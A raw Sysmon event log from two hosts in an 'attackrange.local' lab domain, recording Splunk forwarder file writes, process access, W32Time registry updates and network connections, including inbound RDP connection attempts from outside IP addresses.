07:58:54.021{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051761Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:54.021{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F63E-60EB-987D-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051760Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:54.021{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F63E-60EB-987D-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051759Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:54.008{466BC892-F63E-60EB-987D-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051777Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:55.622{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DA3D454C958C8602B47A5FF4AA0D991,SHA256=F44318A2A9BEF076C26D374BCD09C49239A297616B41E0EDB1697AD465D91132,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000808773Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:54.491{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-37871-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000808772Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:55.675{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D2EC6CCC3D83272A78D910072E99BF8F,SHA256=49382CAA59E2FD8717775D820D36979661902ADDD548AAA064D73F5B4DCA28BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808771Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:55.675{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=11C0899C907764E2A297206E2C263614,SHA256=D6602F19A2059E8B6073B152651305B51526FD7D76A4CA66AEA3D90D74C15E30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808770Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:55.066{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A671CDD868C744D190944A73EAEFFA4,SHA256=368F88428B6CBFABEA2F675EBEC1690DEE5D063F4AEEAD5D0F5395682F8C69B4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051776Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:46.988{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-60313-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 354300x80000000000000001051775Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:46.773{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51119-false10.0.1.12-8000- 354300x80000000000000001051774Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:46.110{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51118-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001051773Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:46.110{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51118-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 23542300x80000000000000001051772Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:55.006{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B1B56FF334AE7ED438F82071699BD008,SHA256=A9A93695668F7B2D1813C69B67D83EA9F2BDDB33DEFC9659DE2CADC4763221A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051778Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:56.640{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F78C416BFCD8F654082FE5E5075B7FA9,SHA256=80E2EA3F28C2634292864E31AFF8388019498268970747C6D0A40F2382113320,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808774Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:56.066{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F19B3C6F902E97ACE0C2BC99F14A7EC,SHA256=9DE0C15ABCEDDE4A0AE76C04B46248DF33296F8B0E3090D8495763154979FE3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051781Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:57.643{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C229E76B58606E765A3DC5C0190F7F20,SHA256=1E3FA81160DB4F12CEA7C1C5757E3230D4F6FC25FC08857B3BA0A9FC73FB214D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808777Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:56.229{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57351-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000808776Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:54.807{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57350-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000808775Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:57.081{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFC243EFF2F5DF8CF225B91B168252C5,SHA256=9A37E9D0B92F51036745FDEA8CCE62E0BED440DA1C04B8EA27F1E50B9E5CD7F4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051780Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:48.193{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57350-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001051779Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:57.159{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051783Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:58.662{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11D027316F4EC3161B06A35B9ED7B4D7,SHA256=411F888F4C887D71579E31D3B85C22E9F02CAE848EE6BF79D90970FD81B8EE52,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000808778Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:58.097{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E37715F725E921219B60B4E282DC401C,SHA256=24BF90B98B74365A0928475A6567670A418DAE3E7DF2EE544E5518CB97670583,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051782Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:58.208{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf6f702d.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051795Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:59.677{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAACB3FF19AD25266ECF4F33926DB5FF,SHA256=EF791B30C874D6CB3090BB72A4BFD1570EE93E4C8AFDF34368C449C9C7A2E0BD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808781Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:57.861{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse84.242.35.58static-host-84-242-35-58.awasr.om57560-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 
23542300x8000000000000000808780Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:59.253{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D2EC6CCC3D83272A78D910072E99BF8F,SHA256=49382CAA59E2FD8717775D820D36979661902ADDD548AAA064D73F5B4DCA28BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808779Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:59.113{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=943F066A3A62508FBC5DBC191C8927D8,SHA256=F8C6553B9AF785FACC342FA1565BD630D748B30DEFA5432023818951D0C4FD83,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001051794Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:58:59.639{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001051793Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:58:59.639{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f6f75ca) 13241300x80000000000000001051792Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:58:59.639{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776eb-0x6366ccec) 
13241300x80000000000000001051791Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:58:59.639{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f3-0xc52b34ec) 13241300x80000000000000001051790Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:58:59.639{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fc-0x26ef9cec) 13241300x80000000000000001051789Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:58:59.639{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001051788Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:58:59.639{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f6f75ca) 13241300x80000000000000001051787Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:58:59.639{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776eb-0x6366ccec) 13241300x80000000000000001051786Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:58:59.639{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f3-0xc52b34ec) 13241300x80000000000000001051785Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 
07:58:59.639{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fc-0x26ef9cec) 354300x80000000000000001051784Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.673{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51120-false10.0.1.12-8089- 10341000x80000000000000001051801Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:00.692{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001051800Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:00.692{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001051799Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:00.692{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001051798Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:00.692{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001051797Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:00.692{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf6f79d1.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051796Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:00.677{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C50F2F17C04C04165D5128743A18760,SHA256=ED9C966030F028D2B6B2D54D93D587EE5D77A928D16F3E0445B98D93DCFBCF05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808782Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:00.144{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33CC3E055F94812A386F3D55E91B831F,SHA256=C3B925214CC9D479B41D43372CBF5F3E6F45C90971A2D13159C68DDDF7F2FC40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051803Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:01.692{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3732BD00001EDD4621A23878A4A0C2F,SHA256=1000C9ED988D746BD8E5AA7859873F25560F33C84232BAC05A30E96662A9D35F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808783Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:01.159{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B3679F7A5CEF6FEF9E1A5307C359532,SHA256=3187DC94525FEE62382F2BB179383412B3FC5D174F62BD317D7AA870A033A57B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051802Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.697{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program 
